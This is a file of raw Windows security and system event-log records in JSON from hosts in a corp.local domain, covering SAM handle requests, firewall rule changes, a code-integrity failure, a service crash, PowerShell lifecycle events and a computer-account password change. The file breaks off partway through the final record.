{"EventTime":"2021-10-02T05:28:30.134199+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4661,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12803,"OpcodeValue":0,"RecordNumber":190890673,"ExecutionProcessID":512,"ExecutionThreadID":520,"Channel":"Security","Message":"A handle to an object was requested.\r\n\r\nSubject :\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tDC01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nObject:\r\n\tObject Server:\tSecurity Account Manager\r\n\tObject Type:\tSAM_USER\r\n\tObject Name:\tS-1-5-21-2569713578-3403938347-3732993993-501\r\n\tHandle ID:\t0x6742c1380\r\n\r\nProcess Information:\r\n\tProcess ID:\t0x200\r\n\tProcess Name:\tC:\\Windows\\System32\\lsass.exe\r\n\r\nAccess Request Information:\r\n\tTransaction ID:\t{00000000-0000-0000-0000-000000000000}\r\n\tAccesses:\tDELETE\r\n\t\t\t\tREAD_CONTROL\r\n\t\t\t\tWRITE_DAC\r\n\t\t\t\tWRITE_OWNER\r\n\t\t\t\tReadGeneralInformation\r\n\t\t\t\tReadPreferences\r\n\t\t\t\tWritePreferences\r\n\t\t\t\tReadLogon\r\n\t\t\t\tReadAccount\r\n\t\t\t\tWriteAccount\r\n\t\t\t\tChangePassword (with knowledge of old password)\r\n\t\t\t\tSetPassword (without knowledge of old password)\r\n\t\t\t\t\r\n\tAccess Reasons:\t\t-\r\n\tAccess Mask:\t0xF00FF\r\n\tPrivileges Used for Access Check:\t-\r\n\tProperties:\t---\r\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}\r\nDELETE\r\nREAD_CONTROL\r\nWRITE_DAC\r\nWRITE_OWNER\r\nReadGeneralInformation\r\nReadPreferences\r\nWritePreferences\r\nReadLogon\r\nReadAccount\r\nWriteAccount\r\nChangePassword (with knowledge of old password)\r\nSetPassword (without knowledge of old password)\r\n\t\t{ab721a53-1e2f-11d0-9819-00aa0040529b}\r\nDELETE\r\nREAD_CONTROL\r\nWRITE_DAC\r\nWRITE_OWNER\r\nReadGeneralInformation\r\nReadPreferences\r\nWritePreferences\r\nReadLogon\r\nReadAccount\r\nWriteAccount\r\nChangePassword (with knowledge of old password)\r\nSetPassword (without knowledge of old password)\r\nListGroups\r\n\t\t\t{bf967938-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{5fd42471-1262-11d0-a060-00aa006c33ed}\r\n\t\t\t{bf9679e8-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a00-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{3e0abfd0-126a-11d0-a060-00aa006c33ed}\r\n\t\t\t{bf967a6a-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967953-0de6-11d0-a285-00aa003049e2}\r\n\t\t{4c164200-20c0-11d0-a768-00aa006e0529}\r\n\t\t\t{bf967915-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a0a-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a68-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a6d-0de6-11d0-a285-00aa003049e2}\r\n\t\t{5f202010-79a5-11d0-9020-00c04fc2d4cf}\r\n\t\t{59ba2f42-79a2-11d0-9020-00c04fc2d3cf}\r\n\t\t\t{bf967985-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967986-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967996-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967997-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf9679aa-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf9679ab-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf9679ac-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a05-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf9679a8-0de6-11d0-a285-00aa003049e2}\r\n\t\t{e48d0154-bcf8-11d1-8702-00c04fb96050}\r\n\t\t\t{bf967950-0de6-11d0-a285-00aa003049e2}\r\n\t\t{bc0ac240-79a9-11d0-9020-00c04fc2d4cf}\r\n\t\t\t{bf967991-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf96792e-0de6-11d0-a285-00aa003049e2}\r\n\t\t{00299570-246d-11d0-a768-00aa006e0529}\r\n\t\t{7ed84960-ad10-11d0-8a92-00aa006e0529}\r\n\r\n\tRestricted SID Count:\t0","Category":"SAM","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"DC01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ObjectServer":"Security Account Manager","ObjectType":"SAM_USER","ObjectName":"S-1-5-21-2569713578-3403938347-3732993993-501","HandleId":"0x6742c1380","TransactionId":"{00000000-0000-0000-0000-000000000000}","AccessList":"%%1537\r\n\t\t\t\t%%1538\r\n\t\t\t\t%%1539\r\n\t\t\t\t%%1540\r\n\t\t\t\t%%5440\r\n\t\t\t\t%%5441\r\n\t\t\t\t%%5442\r\n\t\t\t\t%%5443\r\n\t\t\t\t%%5444\r\n\t\t\t\t%%5445\r\n\t\t\t\t%%5446\r\n\t\t\t\t%%5447\r\n\t\t\t\t","AccessReason":"-","AccessMask":"0xf00ff","PrivilegeList":"-","Properties":"---\r\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}\r\n%%1537\r\n%%1538\r\n%%1539\r\n%%1540\r\n%%5440\r\n%%5441\r\n%%5442\r\n%%5443\r\n%%5444\r\n%%5445\r\n%%5446\r\n%%5447\r\n\t\t{ab721a53-1e2f-11d0-9819-00aa0040529b}\r\n%%1537\r\n%%1538\r\n%%1539\r\n%%1540\r\n%%5440\r\n%%5441\r\n%%5442\r\n%%5443\r\n%%5444\r\n%%5445\r\n%%5446\r\n%%5447\r\n%%5448\r\n\t\t\t{bf967938-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{5fd42471-1262-11d0-a060-00aa006c33ed}\r\n\t\t\t{bf9679e8-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a00-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{3e0abfd0-126a-11d0-a060-00aa006c33ed}\r\n\t\t\t{bf967a6a-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967953-0de6-11d0-a285-00aa003049e2}\r\n\t\t{4c164200-20c0-11d0-a768-00aa006e0529}\r\n\t\t\t{bf967915-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a0a-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a68-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a6d-0de6-11d0-a285-00aa003049e2}\r\n\t\t{5f202010-79a5-11d0-9020-00c04fc2d4cf}\r\n\t\t{59ba2f42-79a2-11d0-9020-00c04fc2d3cf}\r\n\t\t\t{bf967985-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967986-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967996-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967997-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf9679aa-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf9679ab-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf9679ac-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a05-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf9679a8-0de6-11d0-a285-00aa003049e2}\r\n\t\t{e48d0154-bcf8-11d1-8702-00c04fb96050}\r\n\t\t\t{bf967950-0de6-11d0-a285-00aa003049e2}\r\n\t\t{bc0ac240-79a9-11d0-9020-00c04fc2d4cf}\r\n\t\t\t{bf967991-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf96792e-0de6-11d0-a285-00aa003049e2}\r\n\t\t{00299570-246d-11d0-a768-00aa006e0529}\r\n\t\t{7ed84960-ad10-11d0-8a92-00aa006e0529}\r\n","RestrictedSidCount":"0","ProcessId":"0x200","ProcessName":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2021-10-02T05:28:30.212370+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T05:28:30.134199+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4658,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12804,"OpcodeValue":0,"RecordNumber":190890675,"ExecutionProcessID":4,"ExecutionThreadID":2908,"Channel":"Security","Message":"The handle to an object was closed.\r\n\r\nSubject :\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tDC01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nObject:\r\n\tObject Server:\t\tSecurity Account Manager\r\n\tHandle ID:\t\t0x674201760\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x200\r\n\tProcess Name:\t\tC:\\Windows\\System32\\lsass.exe","Category":"Other Object Access Events","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"DC01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ObjectServer":"Security Account Manager","HandleId":"0x674201760","ProcessId":"0x200","ProcessName":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2021-10-02T05:28:30.212370+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T13:09:32.222426+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4947,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":4064686,"ActivityID":"{1861A8E2-AEB2-0000-61A9-6118B2AED701}","ExecutionProcessID":640,"ExecutionThreadID":4564,"Channel":"Security","Message":"A change was made to the Windows Firewall exception list. A rule was modified.\r\n\t\r\nProfile Changed:\tAll\r\n\r\nModified Rule:\r\n\tRule ID:\t{9067517D-6E0E-4ACA-81A5-93FC55254F9F}\r\n\tRule Name:\t7993f5e6-503d-4945-b625-d1cc888ae184","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","ProfileChanged":"All","RuleId":"{9067517D-6E0E-4ACA-81A5-93FC55254F9F}","RuleName":"7993f5e6-503d-4945-b625-d1cc888ae184","EventReceivedTime":"2021-10-01T13:09:33.881737+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T13:09:32.222339+05:45","Hostname":"IT01.corp.local","Keywords":"9223374235878031360","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2005,"SourceName":"Microsoft-Windows-Windows Firewall With Advanced Security","ProviderGuid":"{D1BC9AFF-2ABF-4D71-9146-ECB2A986EB85}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":11656,"ExecutionProcessID":1552,"ExecutionThreadID":6336,"Channel":"Microsoft-Windows-Windows Firewall With Advanced Security/Firewall","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"A rule has been modified in the Windows Defender Firewall exception list.\r\n\r\nModified Rule:\r\n\tRule ID:\t{9067517D-6E0E-4ACA-81A5-93FC55254F9F}\r\n\tRule Name:\t7993f5e6-503d-4945-b625-d1cc888ae184\r\n\tOrigin:\tLocal\r\n\tActive:\tYes\r\n\tDirection:\tInbound\r\n\tProfiles:\tPrivate,Domain, Public\r\n\tAction:\tAllow\r\n\tApplication Path:\tC:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\r\n\tService Name:\t\r\n\tProtocol:\tUDP\r\n\tSecurity Options:\tNone\r\n\tEdge Traversal:\tNone\r\n\tModifying User:\tS-1-5-18\r\n\tModifying Application:\tC:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{3A6BC05A-246C-4B78-8526-A0FAA476A761}\\EDGEMITMP_38766.tmp\\setup.exe","Opcode":"Info","RuleId":"{9067517D-6E0E-4ACA-81A5-93FC55254F9F}","RuleName":"7993f5e6-503d-4945-b625-d1cc888ae184","Origin":"1","ApplicationPath":"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe","Direction":"1","Protocol":"17","LocalPorts":"5353","RemotePorts":"*","Action":"3","Profiles":"2147483647","LocalAddresses":"*","RemoteAddresses":"*","EmbeddedContext":"Microsoft Edge","Flags":"1","Active":"1","EdgeTraversal":"0","LooseSourceMapped":"0","SecurityOptions":"0","ModifyingUser":"S-1-5-18","ModifyingApplication":"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{3A6BC05A-246C-4B78-8526-A0FAA476A761}\\EDGEMITMP_38766.tmp\\setup.exe","SchemaVersion":"542","RuleStatus":"65536","LocalOnlyMapped":"0","EventReceivedTime":"2021-10-01T13:09:33.881737+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T13:13:56.248860+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9227875636482146304","EventType":"AUDIT_FAILURE","SeverityValue":4,"Severity":"ERROR","EventID":6281,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12290,"OpcodeValue":0,"RecordNumber":894537,"ExecutionProcessID":4,"ExecutionThreadID":4424,"Channel":"Security","Message":"Code Integrity determined that the page hashes of an image file are not valid. The file could be improperly signed without page hashes or corrupt due to unauthorized modification. The invalid hashes could indicate a potential disk device error.\r\n\r\nFile Name:\t\\Device\\HarddiskVolume2\\Windows\\System32\\aepic.dll\t","Category":"System Integrity","Opcode":"Info","param1":"\\Device\\HarddiskVolume2\\Windows\\System32\\aepic.dll","EventReceivedTime":"2021-10-01T13:13:57.944403+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T13:13:58.116270+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9259400833873739776","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":7031,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56617,"ExecutionProcessID":632,"ExecutionThreadID":4292,"Channel":"System","Message":"The Windows Security Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.","param1":"Windows Security Service","param2":"1","param3":"60000","param4":"1","param5":"Restart the service","EventData.Binary":"530065006300750072006900740079004800650061006C007400680053006500720076006900630065000000","EventReceivedTime":"2021-10-01T13:13:58.950999+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T04:55:58.144837+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4798,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13824,"OpcodeValue":0,"RecordNumber":18994779,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":3656,"Channel":"Security","Message":"A user's local group membership was enumerated.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT02$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nUser:\r\n\tSecurity ID:\t\tS-1-5-21-4172363987-4097446635-2680456566-501\r\n\tAccount Name:\t\tGuest\r\n\tAccount Domain:\t\tIT02\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x4d4\r\n\tProcess Name:\t\tC:\\Windows\\System32\\CompatTelRunner.exe","Category":"User Account Management","Opcode":"Info","TargetUserName":"Guest","TargetDomainName":"IT02","TargetSid":"S-1-5-21-4172363987-4097446635-2680456566-501","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT02$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","CallerProcessId":"0x4d4","CallerProcessName":"C:\\Windows\\System32\\CompatTelRunner.exe","EventReceivedTime":"2021-10-02T04:55:59.663632+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T03:02:20.605380+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4690,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12807,"OpcodeValue":0,"RecordNumber":190887410,"ExecutionProcessID":4,"ExecutionThreadID":4296,"Channel":"Security","Message":"An attempt was made to duplicate a handle to an object.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tDC01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nSource Handle Information:\r\n\tSource Handle ID:\t0x26c\r\n\tSource Process ID:\t0x13d4\r\n\r\nNew Handle Information:\r\n\tTarget Handle ID:\t0xd64\r\n\tTarget Process ID:\t0x4","Category":"Handle Manipulation","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"DC01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","SourceHandleId":"0x26c","SourceProcessId":"0x13d4","TargetHandleId":"0xd64","TargetProcessId":"0x4","EventReceivedTime":"2021-10-02T03:02:21.433504+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T03:02:20.605380+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4656,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12800,"OpcodeValue":0,"RecordNumber":190887416,"ExecutionProcessID":512,"ExecutionThreadID":520,"Channel":"Security","Message":"A handle to an object was requested.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tDC01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nObject:\r\n\tObject Server:\t\tSecurity\r\n\tObject Type:\t\tFile\r\n\tObject Name:\t\tC:\\Windows\\WinSxS\\FileMaps\\$$_system32_21f9a9c4a2f8b514.cdf-ms\r\n\tHandle ID:\t\t0x26c\r\n\tResource Attributes:\t-\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x13d4\r\n\tProcess Name:\t\tC:\\Windows\\System32\\rundll32.exe\r\n\r\nAccess Request Information:\r\n\tTransaction ID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\tAccesses:\t\tREAD_CONTROL\r\n\t\t\t\tSYNCHRONIZE\r\n\t\t\t\tReadData (or ListDirectory)\r\n\t\t\t\tReadEA\r\n\t\t\t\tReadAttributes\r\n\t\t\t\t\r\n\tAccess Reasons:\t\tREAD_CONTROL:\tGranted by\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\tSYNCHRONIZE:\tGranted by\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\tReadData (or ListDirectory):\tGranted by\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\tReadEA:\tGranted by\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\tReadAttributes:\tGranted by\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\t\r\n\tAccess Mask:\t\t0x120089\r\n\tPrivileges Used for Access Check:\t-\r\n\tRestricted SID Count:\t0","Category":"File System","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"DC01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ObjectServer":"Security","ObjectType":"File","ObjectName":"C:\\Windows\\WinSxS\\FileMaps\\$$_system32_21f9a9c4a2f8b514.cdf-ms","HandleId":"0x26c","TransactionId":"{00000000-0000-0000-0000-000000000000}","AccessList":"%%1538\r\n\t\t\t\t%%1541\r\n\t\t\t\t%%4416\r\n\t\t\t\t%%4419\r\n\t\t\t\t%%4423\r\n\t\t\t\t","AccessReason":"%%1538:\t%%1801\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\t%%1541:\t%%1801\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\t%%4416:\t%%1801\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\t%%4419:\t%%1801\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\t%%4423:\t%%1801\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\t","AccessMask":"0x120089","PrivilegeList":"-","RestrictedSidCount":"0","ProcessId":"0x13d4","ProcessName":"C:\\Windows\\System32\\rundll32.exe","ResourceAttributes":"-","EventReceivedTime":"2021-10-02T03:02:21.433504+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T04:57:43.602355+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":500,"SourceName":"PowerShell","Version":0,"TaskValue":5,"OpcodeValue":0,"RecordNumber":2057584,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Windows PowerShell","Message":"Command \"\" is Started. \r\n\r\nDetails: \r\n\tNewCommandState=Started\r\n\r\n\tSequenceNumber=26\r\n\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.19041.868\r\n\tHostId=9e1a634c-bd69-49c0-9571-caa27b7ce918\r\n\tHostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';\r\n\tEngineVersion=5.1.19041.868\r\n\tRunspaceId=24619fd4-75be-406b-b906-7daf65757881\r\n\tPipelineId=3\r\n\tCommandName=\r\n\tCommandType=Script\r\n\tScriptName=\r\n\tCommandPath=\r\n\tCommandLine=","Category":"Command Lifecycle","Opcode":"Info","Data":"Started","Data_1":"\tNewCommandState=Started\n\n\tSequenceNumber=26\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.868\n\tHostId=9e1a634c-bd69-49c0-9571-caa27b7ce918\n\tHostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';\n\tEngineVersion=5.1.19041.868\n\tRunspaceId=24619fd4-75be-406b-b906-7daf65757881\n\tPipelineId=3\n\tCommandName=\n\tCommandType=Script\n\tScriptName=\n\tCommandPath=\n\tCommandLine=","EventReceivedTime":"2021-10-02T04:57:44.645032+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T04:57:43.394149+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":501,"SourceName":"PowerShell","Version":0,"TaskValue":5,"OpcodeValue":0,"RecordNumber":2057581,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Windows PowerShell","Message":"Command \"\" is Stopped. \r\n\r\nDetails: \r\n\tNewCommandState=Stopped\r\n\r\n\tSequenceNumber=22\r\n\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.19041.868\r\n\tHostId=9e1a634c-bd69-49c0-9571-caa27b7ce918\r\n\tHostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';\r\n\tEngineVersion=5.1.19041.868\r\n\tRunspaceId=24619fd4-75be-406b-b906-7daf65757881\r\n\tPipelineId=1\r\n\tCommandName=\r\n\tCommandType=Script\r\n\tScriptName=\r\n\tCommandPath=\r\n\tCommandLine=","Category":"Command Lifecycle","Opcode":"Info","Data":"Stopped","Data_1":"\tNewCommandState=Stopped\n\n\tSequenceNumber=22\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.868\n\tHostId=9e1a634c-bd69-49c0-9571-caa27b7ce918\n\tHostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';\n\tEngineVersion=5.1.19041.868\n\tRunspaceId=24619fd4-75be-406b-b906-7daf65757881\n\tPipelineId=1\n\tCommandName=\n\tCommandType=Script\n\tScriptName=\n\tCommandPath=\n\tCommandLine=","EventReceivedTime":"2021-10-02T04:57:43.577923+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T04:36:33.738635+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"0","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":4100,"SourceName":"Microsoft-Windows-PowerShell","ProviderGuid":"{A0C1853B-5C40-4B15-8766-3CF1C58F985A}","Version":1,"TaskValue":106,"OpcodeValue":19,"RecordNumber":7998,"ActivityID":"{63A5CF36-AEB8-0001-511F-A863B8AED701}","ExecutionProcessID":6328,"ExecutionThreadID":2744,"Channel":"Microsoft-Windows-PowerShell/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Error Message = File C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at https:/go.microsoft.com/fwlink/?LinkID=135170.\r\nFully Qualified Error ID = UnauthorizedAccess\r\nRecommended Action = \r\n\r\n\r\nContext:\r\n        Severity = Warning\r\n        Host Name = ConsoleHost\r\n        Host Version = 5.1.19041.610\r\n        Host ID = 8fbaf51c-c06d-4ae9-9a70-9a299b2e3793\r\n        Host Application = powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';\r\n        Engine Version = 5.1.19041.610\r\n        Runspace ID = 61e18963-08f1-411b-83f7-04f09c65205a\r\n        Pipeline ID = 1\r\n        Command Name = \r\n        Command Type = \r\n        Script Name = \r\n        Command Path = \r\n        Sequence Number = 15\r\n        User = PROD\\SYSTEM\r\n        Connected User = \r\n        Shell ID = Microsoft.PowerShell\r\n\r\n\r\nUser Data:\r\n\r\n","Category":"Executing Pipeline","Opcode":"To be used when an exception is raised","ContextInfo":"        Severity = Warning\n        Host Name = ConsoleHost\n        Host Version = 5.1.19041.610\n        Host ID = 8fbaf51c-c06d-4ae9-9a70-9a299b2e3793\n        Host Application = powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';\n        Engine Version = 5.1.19041.610\n        Runspace ID = 61e18963-08f1-411b-83f7-04f09c65205a\n        Pipeline ID = 1\n        Command Name = \n        Command Type = \n        Script Name = \n        Command Path = \n        Sequence Number = 15\n        User = PROD\\SYSTEM\n        Connected User = \n        Shell ID = Microsoft.PowerShell\n","Payload":"Error Message = File C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at https:/go.microsoft.com/fwlink/?LinkID=135170.\nFully Qualified Error ID = UnauthorizedAccess\nRecommended Action = \n","EventReceivedTime":"2021-10-02T04:36:34.726415+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T04:21:34.656739+05:45","Hostname":"IT01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5823,"SourceName":"NETLOGON","TaskValue":0,"RecordNumber":26133,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":" The system successfully changed its password on the domain controller \\\\DC01.corp.local.  This event is logged when the password for the computer account is changed by the system. It is logged on the computer that changed the password.","Opcode":"Info","Data":"\\\\DC01.corp.local","EventReceivedTime":"2021-10-01T04:21:35.170126+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T04:21:34.463665+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4742,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13825,"OpcodeValue":0,"RecordNumber":190867006,"ExecutionProcessID":512,"ExecutionThreadID":4268,"Channel":"Security","Message":"A computer account was changed.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-7\r\n\tAccount Name:\t\tANONYMOUS LOGON\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E6\r\n\r\nComputer Account That Was Changed:\r\n\tSecurity ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1131\r\n\tAccount Name:\t\tIT01$\r\n\tAccount Domain:\t\tCORP\r\n\r\nChanged Attributes:\r\n\tSAM Account Name:\t-\r\n\tDisplay Name:\t\t-\r\n\tUser Principal Name:\t-\r\n\tHome Directory:\t\t-\r\n\tHome Drive:\t\t-\r\n\tScript Path:\t\t-\r\n\tProfile Path:\t\t-\r\n\tUser Workstations:\t-\r\n\tPassword Last Set:\t10/1/2021 4:21:34 AM\r\n\tAccount Expires:\t\t-\r\n\tPrimary Group ID:\t-\r\n\tAllowedToDelegateTo:\t-\r\n\tOld UAC Value:\t\t-\r\n\tNew UAC Value:\t\t-\r\n\tUser Account Control:\t-\r\n\tUser Parameters:\t-\r\n\tSID History:\t\t-\r\n\tLogon 